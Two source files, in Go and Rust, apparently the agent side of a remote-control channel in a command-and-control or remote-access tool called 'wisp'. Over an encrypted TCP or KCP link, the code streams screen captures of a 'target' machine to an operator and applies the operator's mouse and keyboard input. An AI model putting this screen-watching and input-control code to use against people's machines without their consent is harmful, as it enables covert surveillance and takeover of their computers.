File: src/agent/transport/rcp.go
package transport

// RCPClient is the agent side of the remote-control channel: a long-lived TCP
// connection to the server's RCP listener that streams screen frames at a fixed
// rate (independent of the polling sleep) and receives mouse / keyboard input.

import (
	"crypto/rand"
	"encoding/hex"
	"errors"
	"fmt"
	"net"
	"os"
	"runtime"
	"sync"
	"time"

	"github.com/xtaci/kcp-go/v5"

	"github.com/user/wisp/shared/protocol"
)

// recoverPanic logs a background goroutine panic without taking down the agent.
func recoverPanic(where string) {
	if r := recover(); r != nil {
		buf := make([]byte, 1<<16)
		n := runtime.Stack(buf, true)
		fmt.Fprintf(os.Stderr, "[agent] PANIC in %s: %v\n%s\n", where, r, buf[:n])
	}
}

// RCPClient streams screen frames and consumes input events. Proto selects the
// transport: "tcp" (default) or "kcp" (fast UDP-based channel). The transport
// is set by the server per remote-control window via CmdRCPConnect args.
type RCPClient struct {
	Host      string
	AgentID   string // hex-encoded agent id
	Keys      *protocol.SessionKeys
	RSAPubPEM string
	Proto     string // "tcp" or "kcp"
	UseTLS    bool
	Fingerprint string

	// Capture produces one JPEG frame (bytes, width, height). Set by the agent.
	Capture func(quality int) ([]byte, int, int, error)
	// OnInput receives a JSON input message from the server.
	OnInput func(msg string)

	Quality  int
	Interval time.Duration

	mu   sync.Mutex
	conn net.Conn
	stop chan struct{}
	done chan struct{}
	seq  uint64

	// captureErrCount counts consecutive capture failures. A single transient
	// failure (e.g. a busy desktop) must not tear the channel down; only a
	// sustained failure (e.g. no accessible display) closes it, after the
	// reason has been reported to the operator.
	captureErrCount int
}

// Connect dials the RCP listener, authenticates and starts the stream loops.
// An already-open channel is closed first.
func (c *RCPClient) Connect(port int) error {
	c.Close()

	// Default transport is KCP; only an explicit "tcp" opts into TCP.
	if c.Proto == "" {
		c.Proto = "kcp"
	}

	addr := net.JoinHostPort(c.Host, fmt.Sprintf("%d", port))
	var conn net.Conn
	var err error
	if c.Proto == "kcp" {
		var sess *kcp.UDPSession
		sess, err = kcp.DialWithOptions(addr, nil, 0, 0)
		if err != nil {
			return fmt.Errorf("rcp kcp dial: %w", err)
		}
		tuneKCP(sess)
		conn = sess
	} else {
		conn, err = net.DialTimeout("tcp", addr, 10*time.Second)
		if err != nil {
			return fmt.Errorf("rcp dial: %w", err)
		}
	}

	c.mu.Lock()
	c.conn = conn
	c.mu.Unlock()

	if err := c.handshake(conn); err != nil {
		_ = conn.Close()
		return err
	}

	c.mu.Lock()
	c.stop = make(chan struct{})
	c.done = make(chan struct{})
	c.captureErrCount = 0
	c.mu.Unlock()

	go c.run()
	return nil
}

// handshake verifies the server with a random challenge: the challenge is
// encrypted with the server RSA key (only the real server can decrypt it) and
// the reply must come back encrypted with our session keys.
func (c *RCPClient) handshake(conn net.Conn) error {
	challenge := make([]byte, 16)
	if _, err := rand.Read(challenge); err != nil {
		return err
	}

	// The agent id is stored hex-encoded (16 chars); the wire format uses the
	// raw 8 bytes so the server can hex-encode them back to the session id.
	rawID, err := hex.DecodeString(c.AgentID)
	if err != nil {
		return fmt.Errorf("decode agent id: %w", err)
	}
	hello, err := protocol.BuildRCPHello(rawID, challenge, []byte(c.RSAPubPEM))
	if err != nil {
		return err
	}
	if err := protocol.WritePacket(conn, hello); err != nil {
		return fmt.Errorf("write hello: %w", err)
	}

	_ = conn.SetReadDeadline(time.Now().Add(10 * time.Second))
	ack, err := protocol.ReadPacket(conn)
	if err != nil {
		return fmt.Errorf("read ack: %w", err)
	}
	if ack.Type != protocol.TypeRCPAck {
		return fmt.Errorf("rcp handshake rejected (type 0x%02x)", ack.Type)
	}
	dec, err := c.Keys.Decrypt(ack.Payload)
	if err != nil {
		return fmt.Errorf("decrypt ack: %w", err)
	}
	if !stringEqual(dec, challenge) {
		return fmt.Errorf("rcp handshake challenge mismatch")
	}
	return nil
}

func stringEqual(a, b []byte) bool {
	if len(a) != len(b) {
		return false
	}
	for i := range a {
		if a[i] != b[i] {
			return false
		}
	}
	return true
}

// run drives the frame loop and the input reader concurrently.
func (c *RCPClient) run() {
	defer close(c.done)
	defer recoverPanic("rcp.run")
	go c.readLoop()

	interval := c.Interval
	if interval <= 0 {
		interval = 50 * time.Millisecond // 20 fps default
	}
	quality := c.Quality
	if quality <= 0 {
		quality = 45
	}

	ticker := time.NewTicker(interval)
	defer ticker.Stop()

	for {
		select {
		case <-c.stop:
			c.sendClose()
			return
		case <-ticker.C:
			c.sendFrame(quality)
		}
	}
}

// maxCaptureErrCount consecutive capture failures before the channel is closed.
const maxCaptureErrCount = 30

func (c *RCPClient) sendFrame(quality int) {
	if c.Capture == nil {
		c.notifyError("screen capture is not configured")
		return
	}
	data, w, h, err := c.Capture(quality)
	if err != nil {
		// Never silent: a failed capture (e.g. no X11 display on a Linux
		// target, a service-session agent on Windows) used to make the channel
		// look alive while streaming zero frames. Report the first failure to
		// the operator, and only close the channel after a sustained failure —
		// a single transient error (busy desktop) must not kill the stream.
		c.captureErrCount++
		if c.captureErrCount == 1 {
			c.notifyError("screen capture failed: " + err.Error())
		}
		if c.captureErrCount >= maxCaptureErrCount {
			c.Close()
		}
		return
	}
	c.captureErrCount = 0

	// Snapshot the connection and next sequence number under the lock, then
	// write outside it: a stalled KCP writer must not deadlock the reader.
	c.mu.Lock()
	conn := c.conn
	if conn == nil {
		c.mu.Unlock()
		return
	}
	c.seq++
	seq := c.seq
	c.mu.Unlock()

	// Encrypt the frame payload so screen content is not exposed on the wire
	payload := protocol.EncodeRCPFrame(seq, w, h, data)
	enc, err := c.Keys.Encrypt(payload)
	if err != nil {
		return
	}

	// Bound the write time. On a congested link (e.g. KCP backpressure) a write
	// must not freeze the stream loop forever: transient timeouts drop the
	// frame and let the next tick retry; hard errors tear the channel down.
	_ = conn.SetWriteDeadline(time.Now().Add(2 * time.Second))
	if err := protocol.WritePacket(conn, &protocol.Packet{Type: protocol.TypeRCPFrame, Payload: enc}); err != nil {
		if errors.Is(err, os.ErrDeadlineExceeded) {
			return
		}
		c.Close()
	}
}

// readLoop consumes server messages (input events / close). The read deadline
// is long enough to outlive several server pings: the server only sends input
// events while the operator interacts, and otherwise keeps the channel alive
// with a keepalive ping every rcpPingInterval (10s). Without the ping a channel
// would be torn down after ~45s of pure viewing (the old "turns to 0 FPS" bug).
func (c *RCPClient) readLoop() {
	defer recoverPanic("rcp.readLoop")
	for {
		c.mu.Lock()
		conn := c.conn
		c.mu.Unlock()
		if conn == nil {
			return
		}
		_ = conn.SetReadDeadline(time.Now().Add(45 * time.Second))
		pkt, err := protocol.ReadPacket(conn)
		if err != nil {
			c.Close()
			return
		}
		switch pkt.Type {
		case protocol.TypeRCPInput:
			dec, err := c.Keys.Decrypt(pkt.Payload)
			if err != nil {
				continue
			}
			if c.OnInput != nil {
				c.OnInput(string(dec))
			}
		case protocol.TypeRCPPing:
			// keepalive — loop around and reset the read deadline
		case protocol.TypeRCPClose:
			c.Close()
			return
		}
	}
}

func (c *RCPClient) sendClose() {
	c.mu.Lock()
	defer c.mu.Unlock()
	if c.conn != nil {
		_ = protocol.WritePacket(c.conn, &protocol.Packet{Type: protocol.TypeRCPClose})
	}
}

// notifyError sends a stream error to the server without closing the channel.
// The operator sees the reason in the remote-control window while the stream
// keeps trying (a transient failure must not kill the session).
func (c *RCPClient) notifyError(msg string) {
	c.mu.Lock()
	conn := c.conn
	c.mu.Unlock()
	if conn == nil {
		return
	}
	if enc, err := c.Keys.Encrypt([]byte(msg)); err == nil {
		_ = protocol.WritePacket(conn, &protocol.Packet{Type: protocol.TypeRCPError, Payload: enc})
	}
}

// reportError sends a stream error to the server, then tears the channel down.
func (c *RCPClient) reportError(msg string) {
	c.notifyError(msg)
	c.Close()
}

// Close tears down the channel and its loops.
func (c *RCPClient) Close() {
	c.mu.Lock()
	if c.stop != nil {
		select {
		case <-c.stop:
			// already closed
		default:
			close(c.stop)
		}
	}
	conn := c.conn
	c.conn = nil
	stopCh := c.stop
	c.mu.Unlock()

	if conn != nil {
		_ = conn.Close()
	}
	if stopCh != nil {
		select {
		case <-c.done:
		case <-time.After(2 * time.Second):
		}
	}
}

// Connected reports whether a channel is currently open.
func (c *RCPClient) Connected() bool {
	c.mu.Lock()
	defer c.mu.Unlock()
	return c.conn != nil
}

File: src/agent-rust/src/transport/rcp.rs
// RCP (Remote Control Protocol) client — long-lived channel for screen
// streaming + input, independent of the polling sleep. Matches Go
// agent/transport/rcp.go + internal/server/rcp_listener.go.
//
// Handshake:
//   agent → server: TypeRCPHello [8B raw agentID][RSA-OAEP(challenge16)]
//   server → agent: TypeRCPAck   [AES-session(challenge16)]
// Stream:
//   agent → server: TypeRCPFrame [AES-session(seq8BE+w4BE+h4BE+jpeg)]
//   server → agent: TypeRCPInput [AES-session(json)]
//   server → agent: TypeRCPPing  (keepalive, empty payload)
//   agent → server: TypeRCPError [AES-session(msg)] / TypeRCPClose

use crate::protocol::crypto::SessionKeys;
use crate::protocol::{
    read_packet, write_packet, Packet, TYPE_RCP_ACK, TYPE_RCP_CLOSE, TYPE_RCP_ERROR, TYPE_RCP_FRAME,
    TYPE_RCP_HELLO, TYPE_RCP_INPUT, TYPE_RCP_PING,
};
use std::io::Write;
use std::net::TcpStream;
use std::sync::atomic::{AtomicBool, Ordering};
use std::sync::{Arc, Mutex};
use std::time::Duration;

use super::kcp::KcpIo;

/// Frame header: seq(8 BE) + width(4 BE) + height(4 BE).
pub const RCP_FRAME_SIZE: usize = 16;

/// Produces one JPEG frame: (jpeg bytes, width, height).
pub type CaptureFn = Arc<dyn Fn(u8) -> Result<(Vec<u8>, u32, u32), String> + Send + Sync>;
/// Receives a decoded JSON input message from the server.
pub type InputFn = Arc<dyn Fn(String) + Send + Sync>;

/// Backing connection handle shared by the frame/read loops.
enum RcpHandle {
    Tcp(Arc<Mutex<Option<TcpStream>>>),
    Kcp(Arc<Mutex<Option<KcpIo>>>),
}

pub struct RcpClient {
    pub host: String,
    pub port: u16,
    /// Hex-encoded 16-char agent id (raw 8 bytes on the wire).
    pub agent_id: String,
    pub rsa_pub_pem: String,
    pub keys: SessionKeys,
    pub capture: Option<CaptureFn>,
    pub on_input: Option<InputFn>,
    pub quality: u8,
    pub interval: Duration,
    pub proto: String, // "tcp" or "kcp"

    conn: Arc<Mutex<RcpHandle>>,
    running: Arc<AtomicBool>,
}

impl RcpClient {
    pub fn new(
        host: &str,
        port: u16,
        agent_id: &str,
        rsa_pub_pem: &str,
        keys: SessionKeys,
    ) -> Self {
        RcpClient {
            host: host.to_string(),
            port,
            agent_id: agent_id.to_string(),
            rsa_pub_pem: rsa_pub_pem.to_string(),
            keys,
            capture: None,
            on_input: None,
            quality: 45,
            interval: Duration::from_millis(50),
            proto: "tcp".to_string(),
            conn: Arc::new(Mutex::new(RcpHandle::Tcp(Arc::new(Mutex::new(None))))),
            running: Arc::new(AtomicBool::new(false)),
        }
    }

    pub fn connected(&self) -> bool {
        if !self.running.load(Ordering::SeqCst) {
            return false;
        }
        match &*self.conn.lock().unwrap() {
            RcpHandle::Tcp(c) => c.lock().unwrap().is_some(),
            RcpHandle::Kcp(c) => c.lock().unwrap().is_some(),
        }
    }

    /// Dial the RCP listener, authenticate, and start the frame/read loops.
    /// Returns after the handshake completes (channel is live in the background).
    pub fn connect(&self) -> Result<(), String> {
        self.close();
        match self.proto.as_str() {
            "kcp" => self.connect_kcp(),
            _ => self.connect_tcp(),
        }
    }

    fn connect_tcp(&self) -> Result<(), String> {
        let addr = format!("{}:{}", self.host, self.port);
        let conn = TcpStream::connect(&addr).map_err(|e| format!("rcp dial: {e}"))?;
        conn.set_read_timeout(Some(Duration::from_secs(45)))
            .map_err(|e| format!("set timeout: {e}"))?;
        conn.set_write_timeout(Some(Duration::from_secs(5)))
            .map_err(|e| format!("set timeout: {e}"))?;

        self.handshake(&conn)?;

        let t_conn = Arc::new(Mutex::new(Some(conn)));
        *self.conn.lock().unwrap() = RcpHandle::Tcp(t_conn.clone());
        self.running.store(true, Ordering::SeqCst);

        let capture = self.capture.clone();
        let on_input = self.on_input.clone();
        let quality = self.quality;
        let interval = self.interval;

        // Frame loop: capture at a fixed rate, independent of the polling sleep.
        let f_conn = t_conn.clone();
        let f_run = self.running.clone();
        let f_keys = self.keys.clone();
        std::thread::spawn(move || {
            frame_loop(&f_conn, &f_keys, capture.as_ref(), quality, interval, f_run.clone());
        });

        // Read loop: consume server input / ping / close.
        let r_run = self.running.clone();
        let r_keys = self.keys.clone();
        std::thread::spawn(move || {
            read_loop_tcp(t_conn, r_run, r_keys, on_input);
        });
        Ok(())
    }

    fn connect_kcp(&self) -> Result<(), String> {
        let mut io = super::kcp::new_kcp_io(&self.host, self.port, Duration::from_secs(10))
            .map_err(|e| format!("rcp kcp dial: {e}"))?;

        self.handshake_kcp(&mut io)?;

        let k_conn = Arc::new(Mutex::new(Some(io)));
        *self.conn.lock().unwrap() = RcpHandle::Kcp(k_conn.clone());
        self.running.store(true, Ordering::SeqCst);

        let capture = self.capture.clone();
        let on_input = self.on_input.clone();
        let quality = self.quality;
        let interval = self.interval;

        let f_conn = k_conn.clone();
        let f_run = self.running.clone();
        let f_keys = self.keys.clone();
        std::thread::spawn(move || {
            frame_loop_kcp(&f_conn, &f_keys, capture.as_ref(), quality, interval, f_run.clone());
        });
        let p_run = self.running.clone();
        let p_keys = self.keys.clone();
        std::thread::spawn(move || {
            pump_loop_kcp(k_conn, p_run, p_keys, on_input);
        });
        Ok(())
    }

    fn handshake(&self, conn: &TcpStream) -> Result<(), String> {
        let mut challenge = [0u8; 16];
        use rand::RngCore;
        rand::rngs::OsRng.fill_bytes(&mut challenge);

        let raw_id: Vec<u8> = (0..self.agent_id.len() / 2)
            .map(|i| u8::from_str_radix(&self.agent_id[i * 2..i * 2 + 2], 16).unwrap_or(0))
            .collect();

        let enc_challenge = crate::protocol::crypto::rsa_encrypt_oaep(&self.rsa_pub_pem, &challenge)
            .map_err(|e| format!("encrypt challenge: {e}"))?;
        let mut payload = Vec::with_capacity(raw_id.len() + enc_challenge.len());
        payload.extend_from_slice(&raw_id);
        payload.extend_from_slice(&enc_challenge);

        let hello = Packet::new(TYPE_RCP_HELLO, payload);
        let mut c = conn.try_clone().map_err(|e| e.to_string())?;
        write_packet(&mut c, &hello).map_err(|e| format!("write hello: {e}"))?;
        c.flush().map_err(|e| e.to_string())?;

        c.set_read_timeout(Some(Duration::from_secs(10)))
            .map_err(|e| e.to_string())?;
        let ack = read_packet(&mut c).map_err(|e| format!("read ack: {e}"))?;
        if ack.ptype != TYPE_RCP_ACK {
            return Err(format!("rcp handshake rejected (type {:#04x})", ack.ptype));
        }
        let dec = self.keys.decrypt(&ack.payload).map_err(|e| e.to_string())?;
        if dec != challenge {
            return Err("rcp handshake challenge mismatch".into());
        }
        Ok(())
    }

    fn handshake_kcp(&self, io: &mut KcpIo) -> Result<(), String> {
        let mut challenge = [0u8; 16];
        use rand::RngCore;
        rand::rngs::OsRng.fill_bytes(&mut challenge);

        let raw_id: Vec<u8> = (0..self.agent_id.len() / 2)
            .map(|i| u8::from_str_radix(&self.agent_id[i * 2..i * 2 + 2], 16).unwrap_or(0))
            .collect();

        let enc_challenge = crate::protocol::crypto::rsa_encrypt_oaep(&self.rsa_pub_pem, &challenge)
            .map_err(|e| format!("encrypt challenge: {e}"))?;
        let mut payload = Vec::with_capacity(raw_id.len() + enc_challenge.len());
        payload.extend_from_slice(&raw_id);
        payload.extend_from_slice(&enc_challenge);

        io.write_packet_flush(&Packet::new(TYPE_RCP_HELLO, payload))?;
        let ack = io.read_packet_timeout(Duration::from_secs(10))?;
        if ack.ptype != TYPE_RCP_ACK {
            return Err(format!("rcp handshake rejected (type {:#04x})", ack.ptype));
        }
        let dec = self.keys.decrypt(&ack.payload).map_err(|e| e.to_string())?;
        if dec != challenge {
            return Err("rcp handshake challenge mismatch".into());
        }
        Ok(())
    }

    /// Close the channel and stop the loops.
    pub fn close(&self) {
        self.running.store(false, Ordering::SeqCst);
        match &*self.conn.lock().unwrap() {
            RcpHandle::Tcp(c) => {
                let mut guard = c.lock().unwrap();
                if let Some(mut s) = guard.take() {
                    let _ = write_packet(&mut s, &Packet::new(TYPE_RCP_CLOSE, Vec::new()));
                    let _ = s.shutdown(std::net::Shutdown::Both);
                }
            }
            RcpHandle::Kcp(c) => {
                let mut guard = c.lock().unwrap();
                if let Some(mut io) = guard.take() {
                    let _ = io.write_packet_flush(&Packet::new(TYPE_RCP_CLOSE, Vec::new()));
                }
            }
        }
    }
}

/// TCP frame loop: capture → encrypt → write one RCP frame packet.
fn frame_loop(
    conn: &Arc<Mutex<Option<TcpStream>>>,
    keys: &SessionKeys,
    capture: Option<&CaptureFn>,
    quality: u8,
    interval: Duration,
    running: Arc<AtomicBool>,
) {
    let mut seq: u64 = 0;
    let mut err_count: u32 = 0;
    while running.load(Ordering::SeqCst) {
        std::thread::sleep(interval);
        if !running.load(Ordering::SeqCst) {
            break;
        }
        let frame = match capture {
            Some(f) => f(quality),
            None => Err("screen capture is not configured".into()),
        };
        let (jpeg, w, h) = match frame {
            Ok(v) => {
                err_count = 0;
                v
            }
            Err(e) => {
                err_count += 1;
                if err_count == 1 {
                    let _ = send_rcp_tcp(conn, keys, TYPE_RCP_ERROR, e.as_bytes());
                }
                if err_count >= 30 {
                    running.store(false, Ordering::SeqCst);
                    if let Some(c) = conn.lock().unwrap().take() {
                        let _ = c.shutdown(std::net::Shutdown::Both);
                    }
                }
                continue;
            }
        };
        seq += 1;
        let enc = keys.encrypt(&encode_frame(seq, w, h, &jpeg));
        let pkt = Packet::new(TYPE_RCP_FRAME, enc);
        let mut guard = conn.lock().unwrap();
        if let Some(c) = guard.as_mut() {
            c.set_write_timeout(Some(Duration::from_secs(2))).ok();
            if write_packet(c, &pkt).is_err() {
                running.store(false, Ordering::SeqCst);
            }
            c.flush().ok();
        }
    }
}

/// KCP frame loop: same, but writes over the shared KcpIo under the lock.
fn frame_loop_kcp(
    conn: &Arc<Mutex<Option<KcpIo>>>,
    keys: &SessionKeys,
    capture: Option<&CaptureFn>,
    quality: u8,
    interval: Duration,
    running: Arc<AtomicBool>,
) {
    let mut seq: u64 = 0;
    let mut err_count: u32 = 0;
    while running.load(Ordering::SeqCst) {
        std::thread::sleep(interval);
        if !running.load(Ordering::SeqCst) {
            break;
        }
        let frame = match capture {
            Some(f) => f(quality),
            None => Err("screen capture is not configured".into()),
        };
        let (jpeg, w, h) = match frame {
            Ok(v) => {
                err_count = 0;
                v
            }
            Err(e) => {
                err_count += 1;
                if err_count == 1 {
                    let _ = send_rcp_kcp(conn, keys, TYPE_RCP_ERROR, e.as_bytes());
                }
                if err_count >= 30 {
                    running.store(false, Ordering::SeqCst);
                    conn.lock().unwrap().take();
                }
                continue;
            }
        };
        seq += 1;
        let enc = keys.encrypt(&encode_frame(seq, w, h, &jpeg));
        let pkt = Packet::new(TYPE_RCP_FRAME, enc);
        let mut guard = conn.lock().unwrap();
        if let Some(io) = guard.as_mut() {
            if io.write_packet_flush(&pkt).is_err() {
                running.store(false, Ordering::SeqCst);
            }
        }
    }
}

fn encode_frame(seq: u64, w: u32, h: u32, jpeg: &[u8]) -> Vec<u8> {
    let mut p = Vec::with_capacity(RCP_FRAME_SIZE + jpeg.len());
    p.extend_from_slice(&seq.to_be_bytes());
    p.extend_from_slice(&w.to_be_bytes());
    p.extend_from_slice(&h.to_be_bytes());
    p.extend_from_slice(jpeg);
    p
}

/// TCP read loop: block on packets, dispatch input/ping/close.
fn read_loop_tcp(
    conn: Arc<Mutex<Option<TcpStream>>>,
    running: Arc<AtomicBool>,
    keys: SessionKeys,
    on_input: Option<InputFn>,
) {
    while running.load(Ordering::SeqCst) {
        let Some(c) = conn.lock().unwrap().as_ref().map(|c| c.try_clone().unwrap())
        else {
            break;
        };
        let mut tmp = c;
        tmp.set_read_timeout(Some(Duration::from_secs(45))).ok();
        let pkt = match read_packet(&mut tmp) {
            Ok(p) => p,
            Err(_) => {
                running.store(false, Ordering::SeqCst);
                break;
            }
        };
        if !dispatch_packet(&pkt, &keys, &on_input) {
            break;
        }
    }
    if let Some(c) = conn.lock().unwrap().take() {
        let _ = c.shutdown(std::net::Shutdown::Both);
    }
}

/// KCP pump loop: drive UDP→KCP, reassemble packet stream, dispatch messages.
/// Uses a lightweight incremental parser (KCP is a byte stream, so a packet may
/// span chunks).
fn pump_loop_kcp(
    conn: Arc<Mutex<Option<KcpIo>>>,
    running: Arc<AtomicBool>,
    keys: SessionKeys,
    on_input: Option<InputFn>,
) {
    use crate::protocol::{HEADER_SIZE, MAGIC, MAX_PACKET_SIZE};
    let mut buf: Vec<u8> = Vec::new();
    while running.load(Ordering::SeqCst) {
        std::thread::sleep(Duration::from_millis(5));
        if !running.load(Ordering::SeqCst) {
            break;
        }
        let mut guard = conn.lock().unwrap();
        let Some(io) = guard.as_mut() else { break };
        if io.pump_public().is_err() {
            running.store(false, Ordering::SeqCst);
            break;
        }
        while let Some(chunk) = io.recv_available() {
            buf.extend_from_slice(&chunk);
        }
        drop(guard);

        // Parse complete packets out of the accumulated stream.
        loop {
            if buf.len() < HEADER_SIZE {
                break;
            }
            if buf[0..4] != MAGIC {
                running.store(false, Ordering::SeqCst);
                break;
            }
            let size = u32::from_le_bytes(buf[4..8].try_into().unwrap()) as usize;
            if size > MAX_PACKET_SIZE {
                running.store(false, Ordering::SeqCst);
                break;
            }
            let total = HEADER_SIZE + size;
            if buf.len() < total {
                break;
            }
            let pkt = Packet {
                ptype: buf[HEADER_SIZE - 1],
                payload: buf[HEADER_SIZE..total].to_vec(),
            };
            buf.drain(..total);
            if !dispatch_packet(&pkt, &keys, &on_input) {
                running.store(false, Ordering::SeqCst);
                return;
            }
        }
    }
    conn.lock().unwrap().take();
}

fn dispatch_packet(pkt: &Packet, keys: &SessionKeys, on_input: &Option<InputFn>) -> bool {
    match pkt.ptype {
        TYPE_RCP_INPUT => {
            if let Ok(dec) = keys.decrypt(&pkt.payload) {
                if let Some(f) = on_input {
                    f(String::from_utf8_lossy(&dec).into_owned());
                }
            }
            true
        }
        TYPE_RCP_PING => true,
        TYPE_RCP_CLOSE => false,
        _ => true,
    }
}

/// Send one packet encrypted with the session keys (TCP; error/close path).
fn send_rcp_tcp(
    conn: &Arc<Mutex<Option<TcpStream>>>,
    keys: &SessionKeys,
    ptype: u8,
    plaintext: &[u8],
) -> Result<(), String> {
    let enc = keys.encrypt(plaintext);
    let mut guard = conn.lock().unwrap();
    if let Some(c) = guard.as_mut() {
        c.set_write_timeout(Some(Duration::from_secs(2))).ok();
        write_packet(c, &Packet::new(ptype, enc)).map_err(|e| e.to_string())?;
        c.flush().map_err(|e| e.to_string())?;
    }
    Ok(())
}

/// Send one packet encrypted with the session keys (KCP; error/close path).
fn send_rcp_kcp(
    conn: &Arc<Mutex<Option<KcpIo>>>,
    keys: &SessionKeys,
    ptype: u8,
    plaintext: &[u8],
) -> Result<(), String> {
    let enc = keys.encrypt(plaintext);
    let mut guard = conn.lock().unwrap();
    if let Some(io) = guard.as_mut() {
        io.write_packet_flush(&Packet::new(ptype, enc))?;
    }
    Ok(())
}

#[cfg(test)]
mod tests {
    use super::RCP_FRAME_SIZE;

    fn encode_frame(seq: u64, w: u32, h: u32, jpeg: &[u8]) -> Vec<u8> {
        let mut p = Vec::with_capacity(RCP_FRAME_SIZE + jpeg.len());
        p.extend_from_slice(&seq.to_be_bytes());
        p.extend_from_slice(&w.to_be_bytes());
        p.extend_from_slice(&h.to_be_bytes());
        p.extend_from_slice(jpeg);
        p
    }

    #[test]
    fn frame_layout_matches_go() {
        // Matches Go EncodeRCPFrame/DecodeRCPFrame: seq(8 BE)+w(4)+h(4)+jpeg.
        let jpeg = vec![0xFF, 0xD8, 1, 2, 3, 0xFF, 0xD9];
        let p = encode_frame(7, 1920, 1080, &jpeg);
        assert_eq!(p.len(), RCP_FRAME_SIZE + jpeg.len());
        assert_eq!(u64::from_be_bytes(p[0..8].try_into().unwrap()), 7);
        assert_eq!(u32::from_be_bytes(p[8..12].try_into().unwrap()), 1920);
        assert_eq!(u32::from_be_bytes(p[12..16].try_into().unwrap()), 1080);
        assert_eq!(&p[16..], &jpeg[..]);
    }
}
